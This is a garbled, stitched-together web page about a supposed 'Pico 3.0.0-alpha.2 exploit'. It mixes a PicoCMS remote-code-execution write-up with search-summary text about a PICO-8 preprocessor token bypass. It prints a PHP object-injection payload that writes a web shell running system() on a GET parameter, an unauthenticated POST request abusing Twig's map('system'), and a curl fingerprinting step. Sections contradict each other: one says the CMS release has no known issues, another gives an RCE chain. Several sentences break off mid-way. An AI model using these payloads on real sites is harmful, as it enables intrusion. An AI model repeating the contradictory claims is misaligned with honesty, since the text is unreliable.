Pico 3.0.0-alpha.2 Exploit May 2026
To successfully exploit this, the target must meet three conditions (which are the default settings for the alpha release):
A more advanced payload replaces the system call with a full PHP reverse shell or a web-based file manager.
!php/object "O:1:\"S\":1:s:4:\"exec\";s:62:\"file_put_contents('shell.php','<?php system($_GET[\"cmd\"]); ?>')\";"
Once shell.php is written, the attacker has permanent access.
In a secure Pico installation, Twig templates are sandboxed to prevent _self.env.registerUndefinedFilterCallback("exec") style attacks. However, in alpha.2, the allowed_functions blacklist was incomplete.
The Exploit Payload: An attacker submits a crafted HTTP POST request to the theme preview endpoint (which does not require authentication in alpha builds):
POST /?action=preview_theme HTTP/1.1 Host: target-site.com Content-Type: application/x-www-form-urlencoded
theme_template=shell&content=map('system')
Why this works:
The Pico 3.0.0-alpha.2 exploit serves as a stark reminder: caching layers are not security layers. The elegance of flat-file CMS architectures does not immunize them from object injection vulnerabilities.
If you are an early adopter who tested alpha.2 on a live site, assume you are compromised. Rotate your secrets, scan your files, and upgrade immediately. For the rest of us, this is a case study in why you never, ever trust user input—even when it comes from a "harmless" HTTP header.
Stay secure, stay updated.
Have you been affected by this exploit? Share your incident response story in the comments below.
This write-up describes a preprocessor bypass exploit identified in Pico 3.0.0-alpha.2, specifically within the context of the PICO-8 fantasy console's scripting environment. Vulnerability Overview
The vulnerability resides in the PICO-8 preprocessor, which handles syntax extensions (like +=, shorthand if, and ?). Due to how the preprocessor handles multiline strings, an attacker can craft code that "escapes" a string after the preprocessing phase, allowing for arbitrary code execution while significantly reducing token costs for the script. Vulnerability Type: Preprocessor Bypass / Logic Flaw Affected Version: Pico 3.0.0-alpha.2 Impact: Arbitrary code execution and token limit bypass. Exploit Mechanism
The exploit leverages a discrepancy in how the preprocessor treats multiline strings compared to how the final Lua interpreter executes them.
Initial State (Pre-Patch): The malicious code is placed inside a multiline string. To the preprocessor, this counts as a single token.
The Flaw: The preprocessor is "non-syntax-aware." By using specific character sequences, the attacker tricks the preprocessor into terminating the string early or failing to recognize it as a string during its "patching" phase.
Final State (Post-Patch): After the preprocessor finishes its pass, the code that was supposedly inside a string is now treated as regular, executable code by the PICO-8 engine. Proof of Concept (PoC)
According to community research on Google Groups, the exploit allows running any code that fits on one line and avoids specific PICO-8 shorthand (like += or ?).
Token Cost: Only 8 tokens (vs. the hundreds a complex script might usually cost). Sample Trigger:
-- The preprocessor sees a string, but the patched version executes: [=[ exploit_code_here ]=] Use code with caution. Copied to clipboard Pico 3.0.0-alpha.2 Exploit
(Note: The exact character sequence depends on the specific preprocessor "weirdness" mentioned in the alpha.2 release notes.) Impact & Remediation
Security Risk: In a shared environment (like a BBS or education platform), this could lead to unintended script behavior or "impossible" cartridges that exceed standard hardware limits.
Status: Development of the original Pico project has largely ceased. While Pico 3.0.0-alpha.2 was released as a fix for certain fatal errors (such as unparenthesized #608), it introduced or retained these preprocessor quirks.
Recommendation: Users are advised to migrate to more actively maintained flat-file systems or engines like Grav CMS or HTMLy if using Pico as a web CMS. For PICO-8 developers, avoid using unofficial alpha builds for production cartridges.
The "Pico 3.0.0-alpha.2 Exploit" primarily refers to a preprocessor vulnerability in the PICO-8 fantasy console. This exploit targets the way the system's preprocessor handles code, allowing users to execute arbitrary code while bypassing standard token cost limits. Core Mechanism
The exploit leverages "finicky" behavior in the PICO-8 preprocessor. Specifically:
Token Manipulation: Users can place code within a multiline string, which only costs 1 token. After the preprocessor "patches" or processes the code, it is no longer treated as a string, and the system executes it as regular code.
Impact: This allows for the execution of any single-line code at a cost of only 8 tokens, even if the code would naturally exceed that limit.
Limitations: The exploit does not support PICO-8 preprocessor-based syntax extensions like +=, shorthand if statements, or the ? print shortcut. Contextual Distinctions
It is important to distinguish this PICO-8 exploit from other software with similar versioning: To successfully exploit this, the target must meet
PicoCMS: The flat-file CMS Pico v3.0.0-alpha.2 is actually a fix version. It was released to resolve "PHP Fatal error" issues (specifically unparenthesized expressions) and support modern PHP versions like 8.2. Maintainers state it has no known security issues.
Picomatch: A separate library, picomatch, had a vulnerability (CVE-2026-33672) involving "method injection" in POSIX character classes, which was fixed in its own version 3.0.2 (not alpha.2).
Pico-static-server: This Node.js package has a known Directory Traversal vulnerability in version 3.0.0, allowing unauthorized access to sensitive files. Summary of the PICO-8 Exploit Type Preprocessor / Token Bypassing Platform PICO-8 Fantasy Console Exploit Cost Vulnerability Cause Non-syntax-aware preprocessor behavior pico-static-server 3.0.0 - Snyk Vulnerability Database
The primary feature of the Pico 3.0.0-alpha.2 exploit (specifically within the context of token-saving bypass in the platform's preprocessor. Key characteristics of this exploit include: Arbitrary Code Execution
: It allows users to run any single-line code that avoids specific PICO-8 syntax extensions (like or shorthand Token Optimization : It reduces the cost of running that code to only , significantly lower than standard implementations. Preprocessor Manipulation
: The vulnerability stems from how the PICO-8 preprocessor handles multiline strings, allowing code to be treated as a string before a patch and then executed as regular code afterward. In the context of , the 3.0.0-alpha.2 version was actually a security release
intended to fix compatibility issues (such as unparenthesized expressions in PHP 8.0+) rather than a known exploit itself. Other "Pico" software versions have different vulnerabilities, such as a directory traversal pico-static-server Pico 3.0.0-alpha.2 Exploit - Google Groups
As of this writing, Pico 3.0.0-alpha.2 has not received an official CVE ID, primarily because the Pico CMS team explicitly warns that alpha versions are "not for production use." However, security researchers have cataloged the exploit under third-party advisories.
The primary attack vectors identified in this version include:
The most dangerous exploit chains the first two vulnerabilities together, achieving Remote Code Execution (RCE) without authentication. Once shell
The attacker first checks if the target is running the vulnerable version by requesting a non-existent page and looking for the PicoCMS-3.0.0-alpha.2 header.
curl -I https://victim.com/pico/